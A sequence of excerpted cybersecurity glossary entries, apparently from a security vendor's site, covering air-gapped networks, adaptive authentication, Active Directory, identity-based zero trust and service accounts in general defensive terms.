downsides of air-gapped networks in their specific context. Balancing security needs, operational requirements, and usability considerations is crucial in determining the most appropriate cybersecurity measures for the organization. In some cases, a hybrid approach combining air-gapped networks with other security measures may be considered to address specific challenges and strike a balance between security and functionality. Here are a few considerations: Operational Complexity: Implementing and managing an air-gapped network can be very complex and resource-intensive. It requires additional infrastructure, specialized hardware, and careful planning to ensure proper physical isolation and restricted connectivity. Organizations must allocate enough resources for network setup, maintenance, and ongoing monitoring. Limited Functionality: The very nature of air-gapped networks, with their lack of connectivity, can limit the functionality and convenience of certain operations. For example, transferring data between the air-gapped network and external systems may require manual processes, such as using removable media or physically connecting devices. This can slow down workflows and introduce additional steps that need to be carefully managed. Insider Threats: While air-gapped networks provide protection against external cyber threats, they are not immune to insider threats. Authorized individuals with physical access to the network can still pose a risk. Malicious insiders or unintentional mistakes by employees can potentially compromise the security of the air-gapped network. Strict access controls, monitoring, and security awareness training are crucial to mitigate these risks. Malware Transmission: Air-gapped networks are not invulnerable to malware. Although direct internet connectivity is absent, malware can still be introduced through physical media, such as USB drives or external storage devices, which may be used for data transfer. Malicious software can propagate within the network if introduced through such means, requiring strict security protocols and comprehensive scanning measures to prevent infections. Usability Challenges: The physical isolation and restricted connectivity of air-gapped networks can present usability challenges. It may be cumbersome to access and update software, apply security patches, or implement system updates. Additionally, the lack of direct internet access may limit the ability to utilize cloud services, access online resources, or benefit from real-time threat intelligence. Maintenance and Updates: Air-gapped networks require careful maintenance and regular updates to ensure the continued security and functionality of the network. This includes applying security patches, updating software, and conducting periodic audits. Maintaining the integrity of the air-gapped environment and ensuring it remains secure can be resource-intensive and time-consuming. Can air-gapped networks be breached? While air-gapped networks are designed to provide a high level of security and make it extremely challenging for external threats to breach the network, it is important to recognize that no security measure is entirely bulletproof. While the physical isolation and restricted connectivity of air-gapped networks significantly reduce the risk of cyber attacks, there are still potential ways in which they can be breached: Lateral Movement: Once attackers have established an initial foothold in the air-gapped network, they can move laterally across the network using stolen credentials to expand their presence and increase the attack's impact. In 2017, the infamous NotPetya attack performed such lateral movement in both standard IT networks as well as air-gapped OT networks. Insider Threats: One of the primary concerns for air-gapped networks is the insider threat. Malicious insiders who have authorized physical access to the network may intentionally breach the security measures. They can introduce malware or compromise the network's integrity, potentially bypassing security protocols and exposing sensitive information. Social Engineering: Air-gapped networks are not immune to social engineering attacks. Attackers may attempt to manipulate authorized employees with physical access to the network, tricking them into compromising the security measures. For example, an attacker could pose as a trusted individual or exploit human vulnerabilities to gain unauthorized access to the network. Malware Introduction through Physical Media: While air-gapped networks are disconnected from external networks, they can still be vulnerable to malware introduced through physical media, such as USB drives or external storage devices. If such media is connected to the air-gapped network without proper scanning or security measures, malware can potentially infect the network. Side-Channel Attacks: Sophisticated attackers may employ side-channel attacks to gather information from air-gapped networks. These... --- - Published: 2023-01-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/adaptive-authentication/ A dynamic security method that uses contextual signals like device, location, and user behavior to determine whether additional authentication is needed for access. Adaptive authentication is a security mechanism that uses various factors to verify the identity of a user. It is an advanced form of authentication that goes beyond traditional methods such as passwords and PINs. Adaptive authentication takes into account contextual information such as location, device, behavior, and risk level to determine whether a user should be granted access or not. One important aspect of adaptive authentication is its ability to adapt to changing circumstances. For example, if a user logs in from an unfamiliar location or device, the system may require additional verification steps before granting access. Similarly, if a user's behavior deviates from their usual patterns (such as logging in at unusual times), the system may flag this as suspicious and require further verification. This dynamic approach helps ensure that only authorized users are granted access while minimizing disruptions for legitimate users. Importance of Adaptive Authentication in Today's Digital Landscape With cyber threats on the rise, traditional authentication methods such as passwords and security questions are no longer enough to protect sensitive information. This is where adaptive authentication comes in, providing an extra layer of security that can adapt to different situations and user behaviors. Adaptive authentication helps prevent unauthorized access to sensitive data. By analyzing various factors such as location, device type, and user behavior, adaptive authentication can determine whether a login attempt is legitimate or not. This means that even if a hacker manages to obtain a user's password, they will still be unable to access their account without passing additional security measures. Adaptive authentication can also help improve the user experience by reducing the need for cumbersome security measures such as two-factor authentication for every login attempt. Instead, users can enjoy a seamless login process while still benefiting from enhanced security measures in the background. How Adaptive Authentication Works: Techniques and Methods Adaptive authentication is a security measure that uses various techniques and methods to verify the identity of users. One of the most common techniques used in adaptive authentication is multi-factor authentication, which requires users to provide multiple forms of identification before accessing their accounts. This can include something they know (like a password), something they have (like a token or smart card), or something they are (like biometric data). Another technique used in adaptive authentication is behavioral analysis, which looks at how users interact with their devices and applications to determine if their behavior is consistent with what would be expected from them. For example, if a user typically logs in from New York but suddenly attempts to log in from China, this could trigger an alert that prompts additional verification steps. Risk-based authentication is another method used in adaptive authentication, which assesses the level of risk associated with each login attempt based on factors like location, device type, and time of day. If the risk level is deemed high, additional verification steps may be required before granting access. Types of Adaptive Authentication: Multi-Factor, Behavioral, and Risk-Based There are three main types of adaptive authentication: multi-factor, behavioral, and risk-based. Multi-factor authentication (MFA) is a type of adaptive authentication that requires users to provide multiple forms of identification before they can access a system or application. This could include something they know (like a password), something they have (like a token or smart card), or something they are (like biometric data). By requiring multiple factors, adaptive MFA makes it much more difficult for hackers to gain unauthorized access. Behavioral authentication is another type of adaptive authentication that looks at how users interact with a system or application. By analyzing things like keystroke patterns, mouse movements, and other behaviors, this type of authentication can help detect when someone is trying to impersonate an authorized user. Behavioral authentication can be particularly useful in detecting fraud and preventing account takeover attacks. Risk-based authentication takes into account various risk factors when determining whether to grant access to a system or application. These factors might include the location from which the user is accessing the system, the time of day, the device being used, and other contextual information. By analyzing these factors in real-time, risk-based authentication can help prevent fraudulent activity while still allowing legitimate users to access what they need. Adaptive Authentication vs. Traditional Authentication: Pros and Cons Adaptive authentication and traditional authentication are two different approaches to securing digital systems. Traditional authentication methods rely on static credentials such as usernames and passwords, while adaptive authentication uses dynamic factors such as user behavior and risk analysis to determine the level of access granted. One of the main advantages of adaptive authentication is that it can provide a higher level of security than traditional methods, as it takes into account contextual information that can help detect fraudulent activity. However, there are also some drawbacks to using adaptive authentication. One potential issue is that it may be more complex to implement than traditional methods, requiring additional resources and expertise. Additionally, there is a risk that adaptive authentication could lead to false positives or negatives if the system is not properly calibrated or if users' behavior patterns change unexpectedly.  Adaptive AuthenticationTraditional AuthenticationApproachDynamic and context-awareStaticFactors ConsideredMultiple factors (e. g. , device, location, behavior)Fixed credentials (e. g. , username, password)Risk AssessmentEvaluates risk associated with each authentication attemptNo risk assessment, solely based on credentialsAuthentication LevelAdjusts based on risk assessmentFixed level of authentication for all usersSecurityEnhanced security through risk analysisRelies solely on credentials matchingUser ExperienceImproved user experience with reduced repeated authentication for low-risk activitiesSame level of authentication for all activitiesFlexibilityAdapts security measures based on the context of each authentication attemptNo adaptation, fixed security measures Benefits of Adaptive Authentication Enhanced Security: Adaptive Authentication adds an extra layer of security by considering multiple factors and conducting risk assessments. It helps identify suspicious or high-risk activities, such as login attempts from unfamiliar devices or locations. By adapting security measures based on the perceived risk, it helps protect against unauthorized access and potential security breaches. Improved User Experience: Adaptive Authentication can improve the user experience by reducing the need for repeated authentication for low-risk activities. Users may only be prompted for additional verification when the system detects potentially risky behavior or transactions. This streamlined approach reduces friction and enhances convenience for users while maintaining a high level of security. Context-Aware Protection: Adaptive Authentication takes into account contextual information, such as device information, location, IP address, and behavioral patterns. This allows it to identify anomalies and potential threats in real-time. By analyzing the context of each authentication attempt, it can apply appropriate security measures and authentication levels to mitigate risks. Customizable Security Policies: Adaptive Authentication allows organizations to define and implement customizable security policies based on their specific needs and risk profile. It provides flexibility to adjust authentication requirements for different user roles, activities, or scenarios. This flexibility ensures that security measures align with the organization's risk management strategy while accommodating varying user needs. Compliance and Regulatory Alignment: Adaptive Authentication can help organizations meet compliance requirements and align with industry regulations. By implementing robust authentication mechanisms and risk-based assessments, organizations can demonstrate compliance with security standards and protect sensitive data from unauthorized access. Real-Time Threat Detection: Adaptive Authentication systems continuously monitor and analyze user behavior, system logs, and contextual information in real-time. This enables quick detection and response to potential threats or suspicious activities. Adaptive systems can trigger additional authentication steps, such as multi-factor authentication, for high-risk events, ensuring a proactive defense against cyberattacks. Cost-Effective Solution: Adaptive Authentication can potentially reduce costs associated with fraud and security breaches. By dynamically adjusting security measures based on risk, it minimizes unnecessary authentication requests and allows organizations to allocate security resources more efficiently. Additionally, it helps prevent financial losses, reputation damage, and legal consequences resulting from security incidents. These benefits make Adaptive Authentication an attractive choice for organizations aiming to balance security and user experience while effectively mitigating the risks associated with unauthorized access and fraudulent activities. How to Implement Adaptive Authentication Implementing Adaptive Authentication involves several steps to ensure a successful deployment. Here is a general outline of the implementation process: Define Objectives: Start by clearly defining the objectives and goals of implementing Adaptive Authentication. Identify the specific problems or risks you aim to address, such as unauthorized access, fraud, or improving user experience. Determine the desired outcomes and benefits you expect from the implementation. Assess Risk Factors: Conduct a comprehensive risk assessment to identify the key risk factors that should be considered in the Adaptive Authentication process. This may include factors such as device information, location, IP address, user behavior, transaction patterns, and more. Evaluate the significance and impact of each factor on the overall risk assessment. Select Authentication Factors: Determine the authentication factors that will be utilized in the Adaptive Authentication process. These factors can include something the user knows (e. g. , password, PIN), something the user has (e. g. , mobile device, smart card), or something the user is (e. g. , biometric data like fingerprint, facial recognition). Consider a combination of factors to increase security and flexibility. Choose Risk Assessment Algorithms: Select appropriate risk assessment algorithms or methods that can evaluate the risk associated with each authentication attempt. These algorithms analyze the contextual information and authentication factors to generate a risk score or level. Common methods include rule-based systems, machine learning algorithms, anomaly detection, and behavior analysis. Define Adaptive Policies: Create adaptive policies based on the risk assessment results. Define different levels of authentication requirements and security measures corresponding to various risk levels. Determine the specific actions to be taken for different risk scenarios, such as triggering multi-factor authentication, challenging suspicious activities, or denying access. Integrate with Existing Systems: Integrate the Adaptive Authentication solution with your existing authentication infrastructure. This may involve integrating with identity and access management (IAM) systems, user directories, authentication servers, or other relevant components. Ensure that the solution seamlessly integrates into your existing security architecture and workflows. Test and Validate: Conduct thorough testing and validation of the Adaptive Authentication system before deploying it in a production environment. Test different risk scenarios, assess the accuracy of risk assessments, and verify the effectiveness of adaptive policies. Consider conducting pilot tests with a subset of users to gather feedback and fine-tune the system. Monitor and Refine: Once the Adaptive Authentication system is implemented, continuously monitor its performance and effectiveness. Monitor user behavior, system logs, and risk assessment results to identify any anomalies or potential improvements. Regularly update and refine the risk assessment algorithms, adaptive policies, and authentication factors based on feedback and emerging threats. User Education and Communication: Educate your users about the new Adaptive Authentication process and its benefits. Provide clear instructions on how to use the system and what to expect during the authentication process. Communicate any changes in authentication requirements or security measures to ensure a smooth user experience and avoid confusion. Compliance and Regulatory Considerations: Ensure that the Adaptive Authentication implementation aligns with relevant compliance standards and regulations in your industry. Consider privacy regulations, data protection requirements, and any specific guidelines related to authentication and access control. Remember that the implementation process may vary depending on the specific Adaptive Authentication solution you choose and the requirements of your organization. Consulting with security experts or vendors specializing in Adaptive Authentication can provide valuable guidance and assistance throughout the implementation process. Challenges of Implementing Adaptive Authentication While adaptive authentication offers a more secure way of protecting sensitive data, implementing it can be challenging. One of the biggest challenges is ensuring that the system accurately identifies legitimate users while keeping out fraudsters. This requires collecting and analyzing large amounts of data, which can be time-consuming and resource-intensive. To overcome this challenge, organizations need to invest in advanced analytics tools that can quickly analyze user behavior patterns and identify anomalies. They also need to establish clear policies for handling suspicious activities and train their staff on how to respond appropriately. Additionally, they should regularly review their authentication processes to ensure they are up-to-date with the latest security standards. Another challenge is balancing security with user experience. While... --- - Published: 2023-01-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/active-directory/ Active Directory (AD) is Microsoft’s centralized directory service that organizes and manages user accounts, computers, groups, and other network resources, streamlining authentication, authorization, and administration in networked environments. Active Directory (AD) is a directory service developed by Microsoft that provides a centralized location for managing and organizing resources in a networked environment. It serves as a repository for storing information about user accounts, computers, groups, and other network resources. Active Directory is designed to simplify network administration by providing a hierarchical structure and a set of services that enable administrators to manage user authentication, authorization, and access to resources efficiently. How does Active Directory work? Active Directory works by organizing objects into a hierarchical structure called a domain. Domains can be grouped together to form trees, and multiple trees can be connected to create a forest. The domain controller acts as the central server that authenticates and authorizes users, maintains the directory database, and replicates data to other domain controllers within the same domain or across domains. Clients interact with the domain controller to request authentication and access to network resources. Active Directory operates as the authentication infrastructure in practically almost every organizational network today. In the pre-cloud era, all the organizational resources resided exclusively on-premise, making AD effectively the sole identity provider.   However, even at a time when organizations seek to transit workloads and applications to the cloud, AD is still present in more than 95% of organizational networks. This is mainly due to core resources being hard or impossible to migrate to the cloud. What are the 3 main functions of Active Directory? Authentication: Active Directory is used to authenticate users, computers, and other resources on a network. This means that AD verifies the identity of a user or device before allowing access to network resources. Authorization: Once a user or device has been authenticated, AD is used to authorize access to specific resources on the network. This is done by assigning permissions and rights to users and groups, which determine what they are allowed to do on the network. Directory Services: Active Directory is also a directory service, which means that it stores and organizes information about network resources, such as users, computers, and applications. This information can be used to manage and locate resources on the network. Relationship to Azure Active Directory Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. While Active Directory is primarily used for on-premises network environments, Azure AD extends its capabilities to the cloud. Azure AD provides features such as single sign-on (SSO), multi-factor authentication (MFA), and user provisioning for cloud applications and services. It can also synchronize user accounts and passwords from an on-premises Active Directory to Azure AD, allowing organizations to manage user identities consistently across on-premises and cloud environments. Benefits of Active Directory Active Directory offers several benefits for organizations: Centralized User Management: Active Directory provides a centralized location to manage user accounts, groups, and access to resources. This simplifies the administration of user identities and enhances security by enabling consistent access control policies. Single Sign-On (SSO): Active Directory supports SSO, allowing users to authenticate once and access multiple resources without needing to re-enter credentials. This improves user experience and reduces the need for remembering multiple passwords. Resource Management: Active Directory facilitates efficient management of network resources such as computers, printers, and file shares. It enables administrators to organize and secure resources based on user or group permissions, ensuring proper access control. Group Policy Management: Active Directory allows administrators to define and enforce security policies, configurations, and restrictions across the network using Group Policy Objects (GPOs). GPOs enable consistent application of security settings and help maintain compliance with organizational standards. Vulnerabilities in Active Directory While Active Directory provides robust security features, it is not immune to vulnerabilities. Some common vulnerabilities include: Credential Attacks: Attackers may attempt to compromise user credentials through techniques like password cracking, phishing, or credential theft. Weak or easily guessable passwords can be exploited to gain unauthorized access to the Active Directory. Privilege Escalation: If an attacker gains access to a low-privileged account, they may try to escalate privileges within the Active Directory environment. This can lead to unauthorized access to sensitive resources or administrative privileges. Lateral Movement: Once inside the Active Directory, attackers may exploit weak access control or misconfigurations to move laterally within the network, escalating their access and potentially compromising additional resources. Active Directory Replication Vulnerabilities: The replication process in Active Directory may have vulnerabilities that attackers can exploit to manipulate or inject malicious data into the directory database, leading to unauthorized access or disruptions in the replication process. Active Directory cannot detect or prevent Identity Threats: AD cannot provide protection against these attacks since its protection capabilities are limited to checking the match between username and credentials. Since identity threats, by definition, are founded on compromising valid usernames and credentials they can easily bypass AD and impersonate their malicious authentication as a legitimate one. This creates a severe blind spot in organizations’ security architecture that gives rise to numerous variations of lateral movement attacks. It is crucial for organizations to implement strong security measures, such as regular patching, robust password policies, multi-factor authentication, and monitoring, to mitigate these vulnerabilities and protect the integrity and security of their Active Directory environment. Active Directory Structure Components of Active Directory Active Directory is structured using three main components: domains, trees, and forests. A domain is a logical grouping of objects, such as user accounts, computers, and resources, within a network. Domains can be combined to form a tree, which represents a hierarchical structure where child domains are connected to a parent domain. Multiple trees can be linked together to create a forest, which is the highest level of organization in Active Directory. Forests enable the sharing of resources and trust relationships between domains within the same organization or across different organizations. Hierarchical structure of Active Directory Domains in Active Directory follow a hierarchical structure, with each domain having its own unique domain name. Domains can be further divided into organizational units (OUs), which are containers used for organizing and managing objects within a domain. OUs provide a way to delegate administrative tasks, apply group policies, and define access permissions at a more granular level. OUs can be nested within each other to create a hierarchy that aligns with the organization's structure, making it easier to manage and control access to resources. Trust and how it enables secure communication between domains Trust relationships in Active Directory establish secure communication and resource sharing between different domains. A trust is a relationship established between two domains that enables users in one domain to access resources in the other domain. Trusts can be transitive or non-transitive. Transitive trusts allow trust relationships to flow through multiple domains within a forest, while non-transitive trusts are limited to a direct relationship between two specific domains. Trusts enable users to authenticate and access resources across trusted domains, providing a cohesive and secure environment for collaboration and resource sharing within and between organizations. Active Directory Architecture and Components Domain Controllers Domain controllers are key components of Active Directory architecture. They serve as the central servers responsible for authenticating and authorizing user access, maintaining the directory database, and handling directory-related operations within a domain. In a domain, there is typically one primary domain controller (PDC) that holds the read-write copy of the directory database, while additional backup domain controllers (BDCs) maintain read-only copies. Domain controllers replicate and synchronize data using a process called replication, ensuring that changes made in one domain controller are propagated to others, thus maintaining a consistent directory database across the domain. Global Catalog Servers Global catalog servers play a vital role in Active Directory by providing a distributed and searchable catalog of objects across multiple domains within a forest. Unlike domain controllers that store information specific to their domain, global catalog servers store a partial replica of all domain objects in the forest. This enables faster searching and access to information without the need for referrals to other domains. Global catalog servers are beneficial in scenarios where users need to search for objects across domains, such as finding email addresses or accessing resources in a multi-domain environment. Active Directory Sites and Replication Active Directory sites are logical groupings of network locations that represent physical locations within an organization, such as different offices or data centers. Sites help manage network traffic and optimize authentication and data replication within the Active Directory environment. Site links define the network connections between sites and are used to control the replication traffic flow. Site link bridges provide a way to connect multiple site links, allowing efficient replication between non-adjacent sites. The replication process ensures data consistency by replicating changes made in one domain controller to other domain controllers within the same site or across different sites. This process helps maintain a synchronized and up-to-date directory database across the network, ensuring that changes are propagated reliably throughout the Active Directory infrastructure. Active Directory Services Active Directory Domain Services (AD DS) AD DS is the primary service within Active Directory that handles authentication and authorization. It verifies the identity of users and grants them access to network resources based on their permissions. AD DS authenticates users by validating their credentials, such as usernames and passwords, against the directory database. Authorization determines the level of access users have to resources based on their group memberships and security principles. User accounts, groups, and security principles in AD DS User accounts, groups, and security principles are fundamental components of AD DS. User accounts represent individual users and contain information such as usernames, passwords, and attributes like email addresses and phone numbers. Groups are collections of user accounts that share similar permissions and access rights. They simplify access management by allowing administrators to assign permissions to groups rather than individual users. Security principles, such as security identifiers (SIDs), uniquely identify and secure objects within AD DS, providing a foundation for access control and security. Domain controllers and their roles in AD DS Domain controllers are servers that host AD DS and play a vital role in its functioning. They store and replicate the directory database, handle authentication requests, and enforce security policies within their domain. Domain controllers maintain a synchronized copy of the directory database, ensuring consistency across multiple domain controllers. They also facilitate the replication of changes made in one domain controller to others within the same domain or across domains, supporting fault tolerance and redundancy within the AD DS environment. Active Directory Federation Services (AD FS) AD FS enables Single Sign-On (SSO) across different organizations and applications. It acts as a trusted intermediary, allowing users to authenticate once and access multiple resources without the need for separate logins. AD FS provides a secure and seamless authentication experience by leveraging standard protocols such as Security Assertion Markup Language (SAML) and OAuth. It eliminates the need for users to remember multiple credentials and simplifies the management of user access across organizational boundaries. How AD FS establishes trust relationships between organizations AD FS establishes trust relationships between organizations to enable secure communication and authentication. Trust is established through the exchange of digital certificates between the identity provider (IdP) and the relying party (RP). The IdP, typically the organization providing identity information, issues and verifies security tokens containing user claims. The RP, the resource or service provider, trusts the IdP and accepts the security tokens as proof of user authentication. This trust relationship allows users from one organization to access resources in another organization, enabling collaboration and seamless access to shared services. Active Directory Lightweight Directory Services (AD LDS) AD LDS is a lightweight directory service provided by Active Directory. It serves as a directory solution for lightweight applications that require directory functionalities without the need for a full AD DS infrastructure. AD LDS offers a smaller footprint, simplified management, and a more flexible schema than AD DS. It is commonly used in scenarios such as web applications, extranets, and line-of-business applications that require directory services but do not necessitate the complexity of a complete Active Directory deployment. Key features of Active Directory Lightweight Directory Services... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-zero-trust/ A security model where no identity—whether of users, devices, or apps—is inherently trusted; instead, every access request is individually verified with strong identity validation and granular controls. Zero Trust is a security framework designed to mitigate cyber risks by assuming that no user or device should be inherently trusted, regardless of their relationship to a network environment. Instead of relying on a static perimeter defense, Zero Trust seeks to evaluate each access attempt individually in order to protect valuable resources and data. Identity Zero Trust represents an identity-focused approach to Zero Trust architecture, where particular emphasis is placed on implementing robust identity management practices. It operates on the Zero Trust principle of "never trust, always verify" while placing identity at the core of all access control decisions. By integrating identity into the standard Zero Trust model, organizations can establish a much more secure framework by enforcing access controls on a granular level, such as evaluating the legitimacy of every authentication, thus protecting critical assets from bad actors. Integrating Identity into Zero Trust Architecture Identity can be seamlessly integrated into a Zero Trust architecture approach and thus serve as a key factor in the verification and authorization process. The identities of users, devices,, and applications can all be evaluated as part of the process of establishing trust before any access is granting access to a specific resource. This methodology can then enable organizations to enforce much more granular access controls, aligning access privileges with individual identities as well as their associated attributes. By incorporating identity into Zero Trust, organizations can significantly strengthen their security posture and greatly reduce the available attack surface. Key Components of Identity Zero Trust Authentication and AuthorizationThe ability to trust the legitimacy of each authentication plays a pivotal role in the Identity Zero Trust model. This means that every user and device seeking access must have their identity fully verified before access is granted. Methods of verification should include the ability to enforce multi-factor authentication (MFA) on all resources (including tools such as command-line access), implementing the use of biometrics, and maintaining strong password policies across the organization. Once authenticated, users should then only be granted a level of access based on the principle of least privilege. Network SegmentationNetwork segmentation is an integral element of a Zero Trust architecture approach, as it entails dividing the network into isolated segments or zones in order to contain any potential breaches. Through this partitioning, organizations can more easily enforce granular access controls to help ensure that only authorized users can access specific resources and systems. A segmentation approach can greatly minimize the potential attack surface and impede unauthorized access attempts. Continuous Monitoring and AnalysisIn an Identity Zero Trust approach, it becomes essential to have continuous, real-time monitoring capabilities in place in order to immediately detect anomalies, suspicious behavior, or potential threats in order to stop an attack in progress. This should involve leveraging a unified identity protection platform in combination with advanced threat intelligence tools, machine learning algorithms, and security information and event management (SIEM) systems in order to be able to monitor network traffic, user activities such as access requests, and system logs. By being able to monitor and analyze this information in real-time, organizations can respond instantly and often automatically to any security incidents. Least Privilege AccessThe principle of least privilege is a fundamental element of the Zero Trust approach, ensuring that users are only ever granted the minimum amount of access needed to perform their duties. This approach should be broadened to include the analysis of user identities, down to the level of evaluating each authentication in order to prevent unauthorized access to critical resources and limit any potential damage caused by the use of compromised credentials. Administrators should leverage a unified identity protection platform to help them get complete visibility into all users in their environment (including machine-to-machine service accounts) in order to be able to define the correct levels of access rights and privileges for each one. Micro-SegmentationMicro-segmentation can take network segmentation to an even more granular level, dividing a network into smaller and more isolated segments. In this way, each segment can be treated as an independent security zone, with unique access controls and policies. This can enhance security by impeding lateral movement within a network, making it harder for attackers to move from machine to machine and gain unauthorized access to sensitive areas. A similar process is called Identity Segmentation, when users are isolated based on their job functions and business requirements. Benefits of Implementing Identity Zero Trust Implementing an Identity-Focused Zero Trust Architecture offers several key benefits for organizations: Enhanced Security: A Zero Trust approach focused on identity provides a proactive defense mechanism, ensuring that every single access attempt is thoroughly verified and authenticated. By implementing this degree of strict access control, organizations can significantly reduce the risk of unauthorized access and data breaches through the use of compromised credentials. Reduced Attack Surface: Network segmentation and micro-segmentation limit lateral movement within the network, minimizing an organization’s potential attack surface. This makes it more challenging for attackers to be able to quickly traverse a network and gain access to critical resources. Improved Incident Response: By having continuous, real-time monitoring in place, organizations can detect and respond to security incidents immediately, often being able to prevent them automatically. By quickly being able to identify anomalous behavior and any potential threats, security teams can mitigate risks before they escalate or even eliminate them altogether. Compliance and Regulations: Zero Trust Identity not only aligns with various compliance standards and regulations, such as the Payment Card Industry Data Security Standard (PCI DSS) and the General Data Protection Regulation (GDPR), but is increasingly mandated by insurance companies in order to qualify for cyber insurance policies, which now have requirements such as the ability to enforce MFA on all admin access.   Zero Trust has signaled a paradigm shift in the way to approach cybersecurity, and focusing on identity represents the logical first step. By challenging the notion of inherent trust and implementing stringent authentication, access controls, and continuous monitoring around identity, organizations can fortify their defenses and protect critical assets from a wide array of cyber threats. The Role of Identity in Zero Trust Identity lies at the core of cybersecurity, encompassing the unique attributes and characteristics that define individuals, devices, and applications across the digital landscape. Thus, in the context of Zero Trust, identity can serve as the central element to help establish trust and determine access privileges. By effectively managing and verifying identities, organizations can better ensure that only authorized entities are able to gain entry to critical resources. Identity as the Foundation of Zero Trust Zero Trust operates on the principle of "never trust, always verify," which means that identity should become the foundational element that drives the verification process. Instead of relying on previous structures like network perimeters, Identity Zero Trust instead places emphasis on individual identities and their associated attributes in order to determine access permissions. By taking an identity-centric approach, organizations are able to achieve more granular control over access privileges and thus reduce the potential attack surface. The Importance of an Identity-Centric Security Approach An identity-centric security approach is crucial when it comes to Zero Trust for several reasons. First, it enables organizations to establish a strong foundation for access control by ensuring that only verified and authenticated identities can access sensitive resources. Second, it applies the principle of least privilege to identities, granting users only the necessary access rights based on their specific roles and responsibilities. Last, an identity-centric approach enhances visibility and accountability, allowing organizations to track and monitor user activities more effectively as well as take appropriate action quickly. The Role of Identity Providers and Federation Services Identity providers (IdPs) play a crucial role in the development of Identity Zero Trust. IdPs are responsible for verifying user identities, issuing authentication tokens, and managing user attributes. They act as trusted sources of identity information and play a pivotal role in establishing and maintaining trust within the Zero Trust framework. Federation services come into play by enabling secure identity sharing across different domains and organizations. Through the process of federation, organizations can establish trust relationships and streamline the authentication and authorization process for users accessing resources across disparate systems. The Key Elements of Identity in Zero Trust User Identities User identities include employees, contractors, partners, or any individual seeking access to an organization’s resources, including machine-to-machine service accounts. Human identities can verified through robust authentication mechanisms, such as multi-factor authentication (MFA) and biometrics. Non-human identities, such as service accounts, can be identified through their repetitive, machine-like behavior and then have their access limited via policies that ensure they are only allowed to perform specific approved activities. Device Identities Device identities refer to the unique attributes associated with devices seeking access to the network or resources. These identities are established through device authentication processes, ensuring that only trusted and secure devices can connect to the network. Device identities can include characteristics such as hardware identifiers, certificates, and security posture assessments, allowing organizations to enforce security policies and manage access based on device trustworthiness. Application Identities In a Zero Trust approach, applications themselves also possess identities that are critical for ensuring secure access. Applications are assigned unique identities and verified to establish trust. By treating applications as distinct entities with their own identities, organizations can implement granular access controls and ensure that only authorized applications can communicate and interact with each other or access specific resources. Identity Management and Access Controls in Zero Trust Identity management and access controls are essential components of any Zero Trust approach. Identity management involves processes such as user provisioning, identity verification, and role-based access control (RBAC) in order to establish and manage all user identities within the organization. Access controls encompass mechanisms like attribute-based access control (ABAC) and policy enforcement points (PEPs) to enforce fine-grained access decisions based on user, device, and application identities. These controls work in tandem to ensure all identities are properly managed and access is granted based on specific verified and authorized attributes. Implementing Identity Zero Trust Implementing Identity Zero Trust requires careful planning and execution to ensure the seamless integration of identity management practices into a Zero Trust framework. These steps include assessing the current identity infrastructure, designing an identity-centric architecture, selecting appropriate identity technologies, integrating identity solutions with existing systems, and testing and validating the implementation. By following these steps, organizations can establish a robust Identity Zero Trust environment to enhance their cybersecurity defenses. Example of Identity-Based Zero Trust An example of identity-based Zero Trust would be a company that has implemented a Zero Trust security model for their network infrastructure with a strong focus on identity verification – including the following: Multi-factor authentication (MFA) is required for all users in order to access company resources; this can include elements like one-time passcodes (OTPs), biometric identifiers, and more. Network segmentation is used to create micro-segments within the network, limiting the potential damage of a successful attack. All access requests are evaluated in real time for any potential threats and all suspicious activity is flagged immediately. Endpoint security measures such as encryption and firewalls are implemented on all devices, ensuring that only authorized devices can access the network. Identity and Access Management (IAM) systems are used to manage user access and role-based access control is enforced, so users are only given access to the resources they need to perform their job, and no more. The system also has the ability to employ context-aware access control, where access requests are evaluated based on the user’s identity, device, location, time and other contextual information. This approach helps to protect a company’s sensitive information and resources from cyber threats and ensures that only authorized users and devices can access the network and each specific resource. Why Are Companies Moving to Identity Zero Trust? Companies are moving to Identity Zero Trust because this approach dramatically helps them to better protect their sensitive information and resources from cyber threats. The Identity Zero Trust security model assumes that every access request and authentication, regardless of its point of origin or the fact that legitimate... --- - Published: 2023-01-17 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/service-account/ A non-human identity used by applications, services, or automated processes to interact with systems—often needing stringent security oversight. A service account is a non-human account specifically created to enable communication and interaction between various software applications, systems, or services. Unlike user accounts, which are associated with human users, service accounts are meant to represent the identity and authorization of an application or service. They serve as a means for applications to authenticate and interact with other systems, databases, or resources. Key Characteristics of Service Accounts Service accounts possess several key characteristics that distinguish them from user accounts. Firstly, they are assigned unique identifiers and credentials, separate from those used by human users. This allows for the secure and independent authentication of applications and services. Additionally, service accounts are typically granted limited or elevated privileges based on the specific requirements of the application or service they represent. While some service accounts may have restricted access rights to ensure security, others may be granted elevated privileges to perform certain administrative tasks or access sensitive data. Service accounts often possess automation and integration capabilities, enabling seamless communication and interaction between different systems and applications. These accounts can automate various IT processes, perform scheduled tasks, and facilitate integration with external services or cloud platforms. Service Accounts vs User Accounts It's important to understand the differences between service accounts and user accounts. While user accounts are associated with human users and are intended for interactive sessions, service accounts are designed for system-to-system or application-to-application communication - they are a type of non-human identity. User accounts are utilized when human users need to perform actions and tasks within an IT system, such as accessing files, sending emails, or interacting with applications. On the other hand, service accounts represent applications or services themselves and are used to authenticate, authorize, and perform actions on behalf of those applications or services. Service accounts are particularly beneficial in scenarios where continuous and automated operations are required, such as batch processing, background tasks, or integration with cloud services. By using service accounts, organizations can enhance security, improve efficiency, and ensure the smooth functioning of their IT systems. Service Account Use Cases Service accounts are incredibly versatile and find application in various scenarios within an IT system. Database Service Accounts: These service accounts are used to run database management systems (e. g. , Microsoft SQL Server, Oracle Database) or specific database instances. They are created to provide the necessary permissions and access rights to the database services. Web Application Service Accounts: Service accounts created for web applications, such as those running on Internet Information Services (IIS) or Apache Tomcat. These accounts are used to manage the application pools, web services, and other components associated with hosting web applications. File Share Service Accounts: Service accounts that are created to provide access to network file shares or file servers. They are used to authenticate and authorize access to shared files and folders within an organization. Messaging Service Accounts: Service accounts used by messaging systems, such as Microsoft Exchange Server, to manage and operate email services. These accounts handle tasks such as sending, receiving, and processing email messages. Backup Service Accounts: Service accounts created for backup software or services. They are used to perform scheduled backups, interact with backup agents, and access backup storage locations. Application Integration Service Accounts: Service accounts created to facilitate integration between different applications or systems. These accounts are used for authentication and authorization purposes when communicating or exchanging data between 